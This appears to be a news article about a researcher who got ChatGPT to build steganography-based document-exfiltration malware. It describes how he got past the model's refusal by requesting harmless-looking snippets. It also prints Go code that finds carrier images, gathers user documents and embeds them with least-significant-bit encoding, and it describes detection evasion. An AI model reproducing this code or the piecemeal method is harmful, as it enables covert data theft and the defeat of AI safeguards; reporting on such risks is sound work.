A security researcher claims to have used ChatGPT to develop data-exfiltration malware. The malware was built with advanced techniques such as steganography, previously seen only in nation-state attacks, to prove how easy it is to create sophisticated malware using only ChatGPT, without writing any code by hand.

Aaron Mulgrew, a security researcher at Forcepoint, aimed to show how easy it is to evade the insufficient guardrails that ChatGPT has in place.

(Photo: MARCO BERTORELLO/AFP via Getty Images) A computer screen displays the homepage of OpenAI's ChatGPT in Manta, near Turin, on March 31, 2023. Italy's privacy watchdog said in March it had blocked ChatGPT, saying the artificial intelligence app did not respect user data and could not verify users' ages.

"Living Off the Land"

The researcher started by testing what ChatGPT would generate. The first prompt asked outright for something that would qualify as malware, but the model refused to offer any code to help the endeavor.

To work around this, the researcher instead asked for small snippets of helper code and manually assembled them into a complete executable.

The malware was intended for specific high-value individuals. Against such targets, it pays dividends to search for high-value documents already on the C drive rather than risk bringing an external file onto the device and being flagged for calling out to URLs.

The researcher concluded that steganography was the best approach for exfiltration, and that "living off the land" by searching for large image files already present on the drive was the best way to source carrier images.

"Living off the land" refers to using tools and utilities already present on a system rather than downloading and executing new code that may be detected by security solutions.

In this case, the security researcher used this technique to avoid detection while searching for and exfiltrating high-value documents. 

Creating the MVP

The researcher then asked ChatGPT to generate code that searched for a PNG larger than 5MB on the local disk.

The design decision was that a 5MB PNG would easily be large enough to store a fragment of a high-value business-sensitive document such as a PDF or DOCX.
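
Mulgrew did not publish his code, but the search step described above maps onto a short routine. Below is a minimal sketch in Go (the language of Auyer's library, which the malware relied on), assuming the 5MB threshold and a walk of the C drive; the function name findLargePNGs and the error handling are illustrative, not taken from the research:

```go
package main

import (
	"fmt"
	"io/fs"
	"path/filepath"
	"strings"
)

// findLargePNGs walks root and returns the paths of PNG files larger
// than minSize bytes -- the carrier-image search described above.
func findLargePNGs(root string, minSize int64) ([]string, error) {
	var hits []string
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return nil // skip unreadable directories rather than aborting
		}
		if d.IsDir() || !strings.EqualFold(filepath.Ext(path), ".png") {
			return nil
		}
		if info, err := d.Info(); err == nil && info.Size() > minSize {
			hits = append(hits, path)
		}
		return nil
	})
	return hits, err
}

func main() {
	pngs, err := findLargePNGs(`C:\`, 5*1024*1024) // PNGs over 5MB
	if err != nil {
		fmt.Println("walk error:", err)
	}
	for _, p := range pngs {
		fmt.Println(p)
	}
}
```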

The researcher then asked ChatGPT to add code that encodes the found PNG with steganography, using Auyer's ready-made steganography library.
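
Auyer's library is the open-source Go package github.com/auyer/steganography. A hedged sketch of the encoding step, using the library's documented Encode call, might look like the following; the file paths are placeholders rather than details from the research:

```go
package main

import (
	"bytes"
	"image/png"
	"os"

	"github.com/auyer/steganography"
)

func main() {
	// Open and decode the carrier PNG found by the search step.
	carrier, err := os.Open("carrier.png") // placeholder path
	if err != nil {
		panic(err)
	}
	defer carrier.Close()
	img, err := png.Decode(carrier)
	if err != nil {
		panic(err)
	}

	// Read the document fragment to hide (placeholder path).
	payload, err := os.ReadFile("fragment.bin")
	if err != nil {
		panic(err)
	}

	// Embed the payload into the image's least significant bits.
	out := new(bytes.Buffer)
	if err := steganography.Encode(out, img, payload); err != nil {
		panic(err)
	}
	if err := os.WriteFile("encoded.png", out.Bytes(), 0o644); err != nil {
		panic(err)
	}
}
```

Because LSB encoding perturbs only the lowest bit of each color channel, the output image is visually indistinguishable from the original carrier.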

For exfiltration, the researcher prompted ChatGPT for code that iterates over the user's Documents, Desktop, and AppData folders, finding any PDF or DOCX documents to exfiltrate.

For this first iteration of the code, the researcher capped documents at a maximum size of 1MB so that an entire document could be embedded into a single image.
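
The document-gathering step can be sketched the same way. The folder list and the 1MB cap come from the article; the function name and everything else are illustrative:

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// collectDocs gathers PDF and DOCX files of at most maxSize bytes from
// the user's Documents, Desktop, and AppData folders, mirroring the
// iteration step described above.
func collectDocs(maxSize int64) []string {
	home, _ := os.UserHomeDir() // error ignored for brevity in this sketch
	roots := []string{
		filepath.Join(home, "Documents"),
		filepath.Join(home, "Desktop"),
		filepath.Join(home, "AppData"),
	}
	var docs []string
	for _, root := range roots {
		filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
			if err != nil || d.IsDir() {
				return nil
			}
			ext := strings.ToLower(filepath.Ext(path))
			if ext != ".pdf" && ext != ".docx" {
				return nil
			}
			if info, err := d.Info(); err == nil && info.Size() <= maxSize {
				docs = append(docs, path)
			}
			return nil
		})
	}
	return docs
}

func main() {
	for _, p := range collectDocs(1 * 1024 * 1024) { // 1MB cap from the article
		fmt.Println(p)
	}
}
```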

Mulgrew decided that Google Drive would be a good bet for exfiltration, as the entire Google domain tends to be "allow-listed" in most corporate networks.

After combining the snippets, the researcher had an MVP (minimum viable product) that needed testing. The researcher uploaded it to VirusTotal to compare how the out-of-the-box code fared against modern attacks such as Emotet.

Five of the sixty-nine vendors marked the file as malicious.

To optimize the malware and evade detection, the researcher had ChatGPT refactor the code that called Auyer's steganography library, as the external dependency appeared to be leaving a unique, detectable identifier in the compiled EXE.

ChatGPT then created its own LSB (least significant bit) steganography function within the researcher's local app, removing the need to call the external library.
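
The article does not reproduce ChatGPT's replacement function, but the LSB technique it refers to is compact: each payload bit overwrites the least significant bit of a successive carrier byte (for an image, the raw color-channel values). A bare-bones sketch of the idea, not Mulgrew's actual code:

```go
package main

import "fmt"

// embedLSB hides payload bits in the least significant bit of each
// carrier byte (e.g. raw RGBA channel values). It is a minimal
// illustration of the LSB technique described above.
func embedLSB(carrier, payload []byte) error {
	if len(payload)*8 > len(carrier) {
		return fmt.Errorf("carrier too small: need %d bytes", len(payload)*8)
	}
	for i, b := range payload {
		for bit := 0; bit < 8; bit++ {
			idx := i*8 + bit
			carrier[idx] &^= 1                   // clear the LSB
			carrier[idx] |= (b >> (7 - bit)) & 1 // write one payload bit, MSB first
		}
	}
	return nil
}

// extractLSB recovers n payload bytes from the carrier's LSBs.
func extractLSB(carrier []byte, n int) []byte {
	out := make([]byte, n)
	for i := range out {
		for bit := 0; bit < 8; bit++ {
			out[i] = out[i]<<1 | carrier[i*8+bit]&1
		}
	}
	return out
}

func main() {
	carrier := make([]byte, 64) // stands in for 64 color-channel bytes
	if err := embedLSB(carrier, []byte("hi")); err != nil {
		panic(err)
	}
	fmt.Printf("%s\n", extractLSB(carrier, 2)) // prints "hi"
}
```

Inlining the routine this way removes the external library dependency that appeared to be triggering detections.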

Overall, the security researcher demonstrated how easy it is to use ChatGPT to build powerful malware that can evade detection by some malware detection systems.

The research highlights the need for cybersecurity experts and organizations to keep up with emerging threats and the importance of robust detection and prevention mechanisms to protect against such malware.
